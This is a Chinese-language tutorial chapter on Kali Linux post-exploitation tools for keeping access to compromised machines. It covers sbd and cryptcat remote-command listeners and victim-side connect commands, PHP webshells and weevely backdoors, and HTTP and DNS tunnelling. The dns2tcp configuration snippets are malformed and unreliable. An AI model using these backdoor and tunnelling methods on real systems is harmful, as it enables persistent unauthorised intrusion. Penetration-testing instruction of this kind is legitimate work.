Kali Linux - 保持訪問



在本章中,我們將瞭解 Kali 用於維護連線以及在被入侵的機器連線和斷開連線後仍然訪問它的工具。

Powersploit

這是一個用於 Windows 機器上的工具。它在受害者的機器上安裝了 PowerShell。此工具幫助駭客透過 PowerShell 連線到受害者的機器。

要開啟它,請在左側開啟終端並鍵入以下命令進入 powersploit 資料夾:

cd /usr/share/powersploit/ 

如果你鍵入“ls”,它將列出所有 powersploit 工具,你可以在獲得訪問許可權後下載並安裝到受害者的機器上。大多數工具根據其名稱進行自我解釋。

Powersploit

在受害者的機器上下載此工具的一個簡單方法是建立一個 Web 伺服器,powersploit 工具允許使用以下命令輕鬆建立:

python -m SimpleHTTPServer 

Download Tool

之後,如果你鍵入:http://<Kali 機器 ip 地址>:8000/,結果如下。

Directory Listimg

Sbd

sbd 是一個類似於 Netcat 的工具。它是可移植的,可以在 Linux 和 Microsoft 機器上使用。sbd 特點是 AES-CBC-128 + HMAC-SHA1 加密。基本上,它有助於隨時連線到受害者的機器上的特定埠並遠端傳送命令。

要開啟它,請轉到終端並鍵入“sbd -l -p 埠”以使伺服器接受連線。

Connection Accept

在本例中,我們設定埠為 44,伺服器將在該埠監聽。

Case Port

在受害者的站點上,鍵入“sbd 伺服器IP 埠”。將建立一個連線,我們可以在其中傳送遠端命令。

在本例中,它是“localhost”,因為我們在同一臺機器上執行了測試。

Ipofserver

最後,在伺服器上,您將看到連線已發生,如下面的螢幕截圖所示。

Server Connection

Webshell

Webshell 可用於保持訪問許可權或入侵網站。但大多數會被防毒軟體檢測到。C99 php shell 在防毒軟體中非常有名。任何常見的防毒軟體都會很容易地將其檢測為惡意軟體。

通常,它們的主要功能是透過 Web 介面傳送系統命令。

要開啟它,並在終端中鍵入“cd /usr/share/webshells/”

Webshell

如您所見,它們根據程式語言分為不同的類別:asp、aspx、cfm、jsp、perl、php。

如果進入 PHP 資料夾,您可以看到所有用於 php 網頁的 webshell。

Folder

要將 shell 上傳到 Web 伺服器,例如“simple-backdoor.php”,請開啟網頁和 Web shell 的 URL。

最後,寫入 cmd 命令。您將看到所有資訊,如下面的螢幕截圖所示。

Write Command

Weevely

Weevely 是一種 PHP webshell,可以模擬類似 telnet 的連線。它是一個用於 Web 應用程式後期利用的工具,可以用作隱蔽的後門或作為 Web shell 來管理合法的 Web 帳戶,甚至免費託管的帳戶。

要開啟它,請轉到終端並鍵入“weevely”,您可以在其中檢視其用法。

Weevely

要生成 shell,請鍵入“weevely generate 密碼 檔案路徑”。如以下螢幕截圖所示,它在“桌面”資料夾中生成,並且該檔案需要上傳到 Web 伺服器以獲得訪問許可權。

Generate Shell

上傳 Web shell 後,如以下螢幕截圖所示,我們可以使用命令“weevely URL 密碼”透過 cmd 連線到伺服器,您可以在其中看到會話已啟動。

Uploading File

http-tunnel

http-tunnel 建立一個透過 HTTP 請求進行隧道傳輸的雙向虛擬資料流。如果需要,可以透過 HTTP 代理傳送請求。這對於位於限制性防火牆後面的使用者很有用。如果允許透過 HTTP 代理訪問 WWW,則可以使用 http-tunnel 和 telnet 或 PPP 連線到防火牆外部的計算機。

首先,我們應該使用以下命令建立一個隧道伺服器:

httptunnel_server –h 

然後,在客戶端站點上鍵入“httptunnel_client –h”,兩者都將開始接受連線。

dns2tcp

這又是一個隧道工具,可以幫助透過 DNS 流量(即 UDP 53 埠)傳遞 TCP 流量。

要啟動它,請鍵入“dns2tcpd”。當您開啟指令碼時,將解釋其用法。

DNSTcp

在伺服器端,輸入此命令配置檔案。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

在客戶端端,輸入此命令。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

隧道將使用此命令啟動。

cryptcat

它是一個類似於 Netcat 的工具,允許以加密方式與受害者的機器建立 TCP 和 UDP 連線。

要啟動一個伺服器以監聽連線,請鍵入以下命令:

cryptcat –l –p port –n 

cryptcat

其中,

  • -l 表示監聽連線

  • -p 表示埠號引數

  • -n 表示不執行名稱解析

在客戶端站點上,連線命令是“cryptcat 伺服器IP 伺服器埠”

Port of Server
廣告

© . All rights reserved.